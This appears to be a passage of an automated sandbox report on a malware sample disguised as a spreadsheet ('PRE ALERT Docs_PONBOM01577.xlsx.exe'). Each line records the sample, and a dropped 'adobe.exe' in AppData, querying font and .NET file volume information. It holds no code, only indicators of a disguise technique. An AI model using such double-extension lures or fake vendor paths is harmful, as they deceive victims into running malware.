                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
